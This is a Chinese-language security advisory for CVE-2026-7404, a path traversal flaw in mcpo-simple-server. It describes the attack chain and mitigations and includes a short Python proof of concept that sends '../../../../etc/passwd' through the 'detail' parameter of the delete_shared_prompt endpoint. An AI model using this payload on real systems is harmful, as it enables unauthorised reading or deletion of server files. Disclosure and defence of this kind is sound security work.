CVE-2026-7404 CVSS 7.3 高危

CVE-2026-7404 getsimpletool路径穿越漏洞

披露日期: 2026-04-29

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7404

漏洞类型

相对路径穿越

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

getsimpletool mcpo-simple-server

漏洞概述

getsimpletool mcpo-simple-server 0.2.0及以下版本存在严重的安全漏洞。由于`delete_shared_prompt`函数对`detail`参数处理不当，导致相对路径穿越漏洞。未经身份认证的远程攻击者可利用此漏洞读取或删除服务器上的任意文件，造成机密性、完整性及可用性风险。目前官方尚未发布补丁，且公开利用代码已存在，风险极高。

技术细节

该漏洞位于`src/mcpo_simple_server/services/prompt_manager/base_manager.py`文件的`delete_shared_prompt`函数中。问题根源在于未对用户输入的`detail`参数进行严格的路径规范化或校验。攻击者可以通过发送包含`../`序列的恶意请求，利用相对路径穿越技术跳出原本限制的目录。由于CVSS向量显示无需用户交互且无权限要求（PR:N），攻击者可直接向服务器发送特制的数据包，操纵文件操作路径，进而实现对系统敏感文件的访问或破坏。攻击链包括探测接口、构造恶意路径参数、发送请求以及执行文件操作。由于公开利用代码已发布，该漏洞利用门槛低，风险极高。若攻击者成功利用，可能导致配置文件泄露或关键系统文件被删除，严重影响服务稳定性，建议立即采取防护措施。

攻击链分析

STEP 1

侦察

攻击者识别目标服务器上运行的getsimpletool mcpo-simple-server服务版本。

STEP 2

漏洞利用

攻击者向`delete_shared_prompt`接口发送特制请求，在`detail`参数中注入`../`序列以绕过目录限制。

STEP 3

执行攻击

服务器处理恶意参数，导致访问或删除预期目录之外的文件（如系统配置文件）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit(target_url):
    """
    PoC for CVE-2026-7404
    Demonstrates path traversal via the 'detail' parameter.
    """
    # Malicious payload to traverse directories
    # Example: trying to delete or access sensitive files
    payload = {
        "detail": "../../../../etc/passwd"
    }

    try:
        # Sending the malicious request (Assuming POST based on API context)
        response = requests.post(f"{target_url}/delete_shared_prompt", json=payload)
        
        if response.status_code == 200:
            print("[+] Request sent successfully. Check if file was affected.")
            print(f"[+] Response: {response.text}")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
    except Exception as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    # Replace with actual target URL
    target = "http://127.0.0.1:8000"
    exploit(target)

影响范围

getsimpletool mcpo-simple-server <= 0.2.0

防御指南

临时缓解措施

建议立即在防火墙或反向代理层面限制对受影响API的访问，仅允许可信内部IP调用。由于官方尚未响应，建议暂时禁用该功能模块或服务，直至安全更新发布。若无法停机，可手动修改源代码，在处理文件路径前强制添加根目录前缀并过滤`..`字符。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7404
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7404
3 Details https://www.cvedetails.com/cve/CVE-2026-7404/
4 VulDB https://vuldb.com/cve/CVE-2026-7404
5 Link https://github.com/getsimpletool/mcpo-simple-server/
6 Link https://github.com/getsimpletool/mcpo-simple-server/issues/4
7 Link https://vuldb.com/submit/803612
8 Link https://vuldb.com/vuln/360140
9 Link https://vuldb.com/vuln/360140/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表